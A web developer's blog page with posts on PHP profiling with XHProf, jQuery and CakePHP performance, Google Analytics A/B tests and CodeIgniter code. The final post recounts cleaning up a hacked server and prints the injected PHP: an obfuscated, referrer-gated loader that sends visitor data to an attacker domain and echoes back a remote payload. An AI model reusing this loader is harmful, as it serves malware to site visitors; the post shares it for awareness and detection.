Chris Nizzardini, Salt Lake City Utah, Web Developer Specializing in LAMP+Ajax Since 2006

My Blog

Here is my awesome blog. You can find information on programming, linux, documentation, tips for code and database optimization, my thoughts and rants, and whatever else I feel like sharing. Feel free to contribute to the blog by posting comments and asking questions.
Programming

Enhanced PHP performance profiling with Xhprof

XHProf is a function-level hierarchical profiler for PHP and has a simple HTML based navigational interface. The raw data collection component is implemented in C (as a PHP extension). The reporting/UI layer is all in PHP. It is capable of reporting function-level inclusive and exclusive wall times, memory usage, CPU times and number of calls for each function. Additionally, it supports ability to compare two runs (hierarchical DIFF reports), or aggregate results from multiple runs. This extension is available through pecl [ http://pecl.php.net/package/xhprof ].

Xhprof is similiar to the Xdebug profiler and Kcachegrind. I used this xhprof tutorial by Lorenzo Alberton to get started, but I quickly noticed that this was rather inadequate for modern applications using heavy doses of AJAX. In fact using this method breaks requests involving JSON since text/html is appended to each request. This solution also lacked a way of easily accessing previous profiles since it only gives you a link to the profile of the page you are viewing. So what I wanted to do was make a solution that is:

  1. Compatible with JSON requests
  2. Allows me to see all requests I’ve made in chronological order.
  3. Provide a pretty interface.
  4. Uses javascript that is library independent (so I can use it with my mootools and jquery projects).

Here is what I came up with:

Installing Xhprof

You’ll need php5-dev installed on your system. Install Xhprof via pecl and graphviz (for call call grapgs) via apt:

sudo pecl install channel://pecl.php.net/xhprof-0.9.2
sudo apt-get install graphviz

Then create an xhprof.ini file in /etc/php5/conf.d/xhprof.ini and put the following text in it:

xhprof.output_dir="/var/tmp/xhprof"
extension=xhprof.so

In your php.ini file find the auto_append directives and make them look like this:

; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file = /var/www/xhprof/header.php
 
; Automatically add files after PHP document.
; http://php.net/auto-append-file
auto_append_file = /var/www/xhprof/footer.php

Make sure you’ve created the /var/tmp/xhprof directory and a /var/www/xhprof directory. Inside /var/www/xhprof directory create a symbolic link to where the xhprof files are actually installed:

ln -s /usr/share/php/xhprof_html/ xhprof_html

Now we just need to create the header and footer files inside /var/www/xhprof and restart apache2. I’ve put those files in pastebin:

In my /var/www/xhprof directory I added a little PHP icon (you can see this in the example bottom-right of page). When I click on that an overlay is created with all profiling data – you can change the code in footer.php for your own needs. You will only see the data for a given HTTP_HOST. Just click on the resource link and xhprof opens in a new window.

Explanation of XHPROF Report

If you are like me you have no idea what a lot of the columns in the report mean so I decided to add an explanation of the fields you see in the xhprof report.

  • Calls: How many times was this function called
  • Call%: Not sure on this one…
  • Inclusive Wall Time: Wall time is the human perception of the passage of time. So when the report says 17,331 microseconds was spent on an operation – that means this operation (and all of its child operations) took 17.3 milliseconds or 0.0173 seconds. Inclusive means it includes its child operations.
  •  Exclusive Wall Time: Same as inclusive wall time except exclusive means the report is not counting the sum of the operations child processes, no children.
  • Inclusive/Exclusive Memory Usage: How much memory was consumed by this process - similar to memory_get_usage(). Since this is measured in bytes basically each million is worth roughly 1 Megabyte. For instance 2,433,256 means 2.32 MB.
  • Inclusive/Exclusive Peak Memory Usage: How much memory was consumed by this process at its peak - similar to memory_get_peak_usage().
  • Inclusive/Exclusive CPU Microseconds: I am not sure on this one, I think this literally means CPU time. Would love someone to school me up on that one.
Understanding the Percentage Columns
It’s important to note that the percentage columns refer to the percentage of the total. If you run down the column and start adding up all the percents you’ll notice it exceeds 100%. Most people probably already understand this but I was a bit confused at first. In our example above you’ll notice it says call_user_func_array() consumed 19.8% of inclusive memory or 481,760 bytes. If you divide that by the total consumed by main() you’ll see where it got the 19.8%. Remember the difference between inclusive and exclusive – that’s important when reading this report.

*EDIT: Due to an open_basedir restriction in PHP this implementation breaks phpmyadmin. To resolve this you’ll need to find your phpmyadmin apache.conf file and make sure the open_basedir value is set to: php_admin_value open_basedir /usr/share/phpmyadmin/:/etc/phpmyadmin/:/var/lib/phpmyadmin/:/var/www/xhprof/:/usr/share/php/xhprof_lib/utils/

JavaScript and Ajax

Profiling Execution Time in JavaScript and the Perils of jQuery .append()

HI I’m Chris and I’ve been living under a rock because I just barely learned about using the console.profile() function in conjunction with FireBug. Better late than never. I was trying to figure out why appending data to an HTML table with jQuery was so damn time consuming. A quick google search yielded the awesome Console API functions provided by FireBug.

This leads me to my next point, calling a the jQuery append() method in a loop is bad in terms of execution time. This is probably something I should’ve figured out a long time ago, but I haven’t dealt much with client side optimization (most of my experience is server-side optimizations).

Before Optimization:

console.profile('Build table');
for(var i=0; i<o.NavigationItem.length; i++){
    $('#Data').append('<tr><td><a href="javascript:getPartCategory('+id+','+aaia+','+o.NavigationItem[i].ServerItemID+',\''+o.NavigationItem[i].Text+'\')">'+o.NavigationItem[i].Text+'</a></td></tr>');
}
console.profileEnd();

After Optimization:

console.profile('Build table');
var tableStr = '';
for(var i=0; i<o.NavigationItem.length; i++){
    tableStr+= '<tr><td><a href="javascript:getPartCategory('+id+','+aaia+','+o.NavigationItem[i].ServerItemID+',\''+o.NavigationItem[i].Text+'\')">'+o.NavigationItem[i].Text+'</a></td></tr>';
}
$('#Data').append(tableStr);
console.profileEnd();

The big news to me here is the .append() method is slow when compared to appending data to a string and then making a single call to .append(). I am not sure what the trade off here is when you bring memory consumption into the discussion though. This didn’t turn out to be the core reason why this took so long (as you can see we are dealing in milliseconds here) but it was still a neat discovery.

Seo

Using Google Analytics Custom Variables for AB Testing

Setting up AB Tests using Google Analytics is a simple and free alternative to incredibly expensive solutions like Omniture AB Testing. I had actually used Omniture Test and Target with a company I had previously worked with. The results the Omnitures solution gave were very suspect when compared to our own internal tracking stored in a MySQL database on a per order basis. I decided to setup some simple AB Testing on a new project I am working on and was pleased with how easy it was to do using Google Analytics.

Setting up the custom variables

In your sites header file or whatever controller is called on each page load you will want to write a simple “coin flipper” to randomly determine which test a visitor gets.

    if(!isset($_SESSION['AB_Test'])){
        switch(rand(1,2)){
            case 1: // control - current form
                $abtest = 'Test';
                break;
            case 2: // test - single long form
            default:
                $abtest = 'Control';
                break;
        }
        $_SESSION['AB_Test'] = $abtest;
    }
    else{
        $abtest = $_SESSION['AB_Test'];
    }

Add tests to the switch statement as need be. Now you’ll want to define this test as a custom variable in Google Analytics:

    var _gaq = _gaq || [];
    <? if($abtest): ?>
    _gaq.push(['_setCustomVar',
        2,                   // This custom var is set to slot #1.  Required parameter.
        'AB Test',     // The name acts as a kind of category for the user activity.  Required parameter.
        '<?=$abtest?>',               // This value of the custom variable.  Required parameter.
        2                    // Sets the scope to session-level.  Optional parameter.
    ]);
    <? endif; ?>
    _gaq.push(['_setAccount', 'UA-xxxxxxx-x']);
    _gaq.push(['_trackPageview']);
    (function() {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();

Building the custom report

Now we just need to build a custom report:

Google Analytics Custom Report - AB Testing

 

Sit back

Now just sit back as the results come in and hopefully you have a winner! You’ll want the test to run for at least 2 weeks before you can begin to get a true picture of how the test is performing. Don’t be tempted to nominate a winner after a few days as the results can be very skewed early on.

AB Testing Report

Programming

CakePHP Benchmarks on Storing Persistent Cache in APC. Hint: It’s Faster!

 

It’s been a while since I last posted on here so I thought I’d get something up here before my next big blog post. Since starting a new job back in September I’ve been working in CakePHP 1.3 (soon to be 2.0). The other day I had the opportunity to explore optimizing CakePHP. My employers solution is a modified version of CakePHP that powers 100s of websites off of a single install. Unfortunately our component initialization and startup (according to the CakePHP Debug Kit) was looking something like this:

 

After following the instructions in this excellent blog post on 8 ways to speed up CakePHP we saw a speed improvement of roughly 760% in the Component initialization and startup phase of CakePHP. You can see what all its storing in memory by going to the APC info page on your local machine or server and clicking on User Cache Entries. The great thing about this change is its literally 1 extra line of code to your bootstrap.php file:

 

Cache::config('_cake_core_', array('engine'=> 'Apc','duration'=> 3600,'probability'=> 100));

 

Storing Cake Persistent Cache in APC

 

Here are the numbers from the excellent shell utility provided by the CakePHP Debug Kit. To get the benchmark I executed each page listed in the table 100 times to derive averages (Note: I obfuscated the actual page names). Tests were done on my local computer running the LAMP stack on Ubuntu  11.04 64bit (2.6.38-13-generic kernal) with a Quad Core Intel i5 3.10Ghz processor, 8GBs (2x4GB) RAM, and 500GB SATA Drive. For services the machine runs MySQL 5.1.54, PHP 5.3.8, and APC 3.1.3.

 

Page / Metric No APC APC Default Cake APC Cache



/index x100 x100 x100
Total Time (lower is better) 85.31 78.40 61.34
Requests/Second (higher is better) 1.17 1.28 1.63
Average request time (lower is better) 0.85 0.78 0.61

/someother-page
Total Time 74.39 68.14 52.31
Requests/Second 1.34 1.47 1.91
Average request time 0.74 0.68 0.52
/some-category-page
Total Time 100.01 100.52 100.82
Requests/Second 0.39 0.40 0.43
Average request time 2.56 2.51 2.35
/some-item-page
Total Time 99.35 100.33 99.16
Requests/Second 0.59 0.63 0.71
Average request time 1.68 1.59 1.42
Programming

Working Around CodeIgniters Default Session Library

Recently I was attempting to test a web application using BrowserCam. BrowserCam has a bank of virtual machines on different versions of many platforms including Apple OSX, Linux Fedora, and Windows. While attempting to regression test in older versions of IE I noticed I absolutely could not log in to my application. This only occured on BrowserCam. After testing other CI based sites over BrowserCam I eventually narrowed it down to CodeIgniters session library. The session library that ships with CI does not use the native PHP session based files. It instead stores everything in an encrypted cookie. I think this is bad for two reasons: One, it goes against a PHP developers conventional wisdom of how sessions are handled and two, cookies have a storage limitation.

After poking around for some solutions I determined everything out there would cause me to have to change a lot of code. I needed a drop in replacement that would cause me minimal changes. I wrote the following library called Trusession. You simply drop it into your application/libraries folder and do some simple find and replaces. Trusession has most of the same method names, parameters, and return values as CodeIgniters native session library so your application should start working again out of the box except it will now be using PHPs file based sessions. There are a few of the public methods that I did not implement, calling these will result in an exception telling you that it has not been implemented and will give you a stack trace. These can easily be implemented by reverse engineering the CI Session library.
Read Full Blog »

SQL

MySQL Optimization Tip: Checking for Differences in Queries.

I’ve been going through the MySQL slow query log at my new job to optimize our applications performance. It’s a bit more scary making changes when you’re the “new guy” because there are a lot of “gotchas” you haven’t quite figured out in the new platform. Well one of the queries that I wanted to optimize lead me to get rid of some needless LEFT JOINS and trim down the amount of fields returned in the result set. Aside from testing the application as a whole after making my modification I needed a fast way to verify the exact same data was being returned for all 50,000 rows. One option was to append each field to a string and then convert that into an MD5 hash for each variation of the query. That seemed half assed too me so I decided to export the results to a CSV file then run a diff against the two from the linux shell. Read Full Blog »

Programming

Inheritance in CodeIgniter: Adding More Functionality To Your Models

I recently blogged on Reducing Code using CodeIgniters Active Record Class. In this blog I focus on easily collecting data from your object members using get_object_vars(). After using this for a while I found that unsetting certain members prior to an insert/update became rather annoying. I’ve been knee deep in Code Igniter for the past 6 months (and CakePHP at my new job) so I decided to take what I’ve learned and create me own parent model class.

Code Igniter allows you to create your own parent Controllers and Models. This is a great way of extending core functionality into child models via inheritance. The CodeIgniter documentation covers this in Creating Core System Classes so I won’t go into that process too much. Instead I’ll focus on what I’ve done and how it speeds up programming by:

  • Reducing boiler plate CRUD code.
  • Handling basic data validation.
  • Leveraging InnoDB to automatically join tables. (I’m saving this one for another blog)
Read Full Blog »
Programming

Unscientific Benchmarking of Type Casting, is_numeric, and regex in PHP

I performed some unscientific PHP benchmarks today pitting casting to an integer against is_numeric against preg_replace. The point was to see which is the fastest way of quickly cleaning user input before passing to a SQL query to prevent against SQL injection. Obviously this would only work on database fields that are integers. To be fair I should’ve benchmarked mysql_real_escape_string in the same way, but I’m sure its a loser in this test. The test is run in a for loop 100,000 times. None of the code being used here is very expensive to begin with — but here we go:

Casting to (INT)

0.017745018005371

Using is_numeric()

0.028823852539062

Using preg_replace()

0.087189197540283

        $start = microtime(true);
        /*for($i=0;$i<100000;$i++){
                $v = (INT) "$i";
        }*/
        /*for($i=0;$i<100000;$i++){
                is_numeric("$i");
        }*/
        for($i=0;$i<100000;$i++){
                preg_replace('/\D/','',"$i");
        }
        $end = microtime(true);
 
        echo "\nTime: ".($end-$start)."\n";
Programming

Reducing Code using CodeIgniters Active Record Class

UPDATE Nov. 9, 2011: I have begun moving away from using this in my code. I am now using a core Model class that is extended by other models that takes care of stuff like this. Please read Inheritance in CodeIgniter: Adding More Functionality To Your Models for more information. While this is still an okay solution it becomes a bitch to remember to unset variables as your classes grow.

This is a quick blog post on some stuff I’ve discovered using CodeIgniters Active Record Class. I’ve found two ways to reduce the amount of code I’m writing.

Simplifying Inserts and Updates:

Since I am new to CodeIgniter I began writing my insert and update statements as follows:

$data = array(
    'tech_id' => $this->tech_id,
    'note_date' => date('Y-m-d'),
    'tech_note' => $this->tech_note,
    'year' => $this->year,
    'model_id' => $this->model_id,
    'is_global' => $this->is_global,
    'auto_glass_part_type_id' => NULL
);
$this->db->insert('tbl_something',$data);

I knew this was bad cause I was doing a bunch of CRUD code that was taking my time away from REAL programming. If you’re using good OOP design patterns you can simplify this:

$data = get_object_vars($this);
$this->db->insert('tbl_something',$data);

Anything that you don’t want included in the insert/update can simply be unset() from the $data array.

Make Query Methods a Swiss Army Knife

Another problem I had in my code I was using multiple methods in model that were doing database calls. These methods were all selecting the same data, they just had different WHERE parameters. So if you have the following code:

public function getAll(){
  $this->db->select('tbl_lead.*, disposition, auto_make.make as make, auto_model.model as model');
  $this->db->where('tbl_lead.shop_id',$this->session->userdata('shop_id'));
  return $this->db->get($this->table_name);
}

You can simplify it as follows:

public function getAll($dbObj=''){
  $this->db->select('tbl_lead.*, disposition, auto_make.make as make, auto_model.model as model');
  if(is_object($dbObj)){
      $this->db = $dbObj;
  }
  return $this->db->get($this->table_name);
}

Now we have a single method that returns everything you need, but gives you the option of passing custom WHERE parameters.

Rant

Evil Hackers from Outerspace

Been having fun since Friday dealing with a compromised server. Somehow an infiltrator loaded two files onto the server in question. One in an OS Commerce directory (very out of date installation) and the other into the root of a Word Press 2.9 install. The malicious code would then phone home to a recently registered domains named jsonapplet.com and bxubwsxj.co.tv. Presumably some sort of virus/trojan was installed on the end-users computer from this domain. Each of these domains just had the default Apache install screen when you went to the index page, but nested in other pages in the server was where the payload was.

Noticing that jsonapplet.com seemed a bit weird (the .TV had not been discovered at this point) we dug in finding that it had just been recently registered to a company in China known for this sort of thing. Whether the company is actually based in China is unknown, but it still served to raise suspicions further.

The PHP script was crafty in that it would only write the malicious javascript to the document if the user had come in from a search engine. This made finding the exploit hard since we were visiting the pages directly (no HTTP REFERRER was set). Furthermore most online scanners would not find the exploit. The only one that reported it was unmaskparasites.com, but even that scanner said it was NOT suspicious. Googles online scanner (even though Google Adwords originally notified the company) and McAffee Scan Alert did not find this exploit either.

Here is the script:

if(empty($_COOKIE["7c6dc"])&amp;&amp; @preg_match("#google|ask|yahoo|baidu|youtube|wiki|qq|go|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|crawler|mail|bing|dogpile|facebook|twitter|live|space|linkedin|flickr|peeplo#is",$_SERVER["HTTP_REFERER"])){@setcookie("7c6dc","1",time()+60*60*24*30,");
        echo '<script type="text/javascript">// <![CDATA[
  document.cookie="7c6dc="+escape("'.time().".".rand(1111111,9999999).'")+"; expires='.date("D, j M Y 00:00:00", time()+60*60*24*30)."; path=/\";
// ]]></script>";
$d=array("HTTP_ACCEPT_CHARSET","HTTP_ACCEPT_LANGUAGE","HTTP_REFERER","REMOTE_ADDR","REQUEST_URI","REQUEST_METHOD","SCRIPT_FILENAME");foreach($d as $v)$t[]=$_SERVER[$v];
$a=strrev('ed'.'oc'.'ne_46e'.''.'sab');$b=strrev('edo'.'ced'.'_46e'.''.'sab');$u=$b("aHR0cDovL2J4dWJ3c3hqLmNvLnR2L2I5MDk/aT0=").$_SERVER["REMOTE_ADDR"]."&amp;r=http:/.$_SERVER["HTTP_HOST"]."&amp;u=".$_SERVER["HTTP_USER_AGENT"]."&amp;d=".$a(serialize($t));@$fn=file_get_contents($u);
if(!$fn||strlen($fn)4){list($crc,$enc)=explode("::",$fn);if(md5($enc)==$crc)echo $b($enc);}}if(isset($_GET["7c6dc"]))echo "7c6dc";

Though somewhat obfuscated a simple grep of the server for document.cookie would have quickly found this. Unfortunately initial greps were looking for things like eval and document.write instead. There are few reports on what the payload actually does from Anubis and Sucuri.

Steps taken :

1. Disabled all SSH access and created new accounts.

2. Checked to see who else was logged into the server using the who command. If anyone had been found those accounts would have been killed.

3. Removed the exploited files.

4. Changed SSH account passwords again.

5. Patched affected and non-affected software throughout the system.

I also contacted leaseweb.com informing them about the account. Contacted unmaskparasites.com as a thanks and to hopefully give them some hints on improving their scanner. Finally at the urging of a fellow developer I wrote this blog to hopefully create some awareness about this exploit.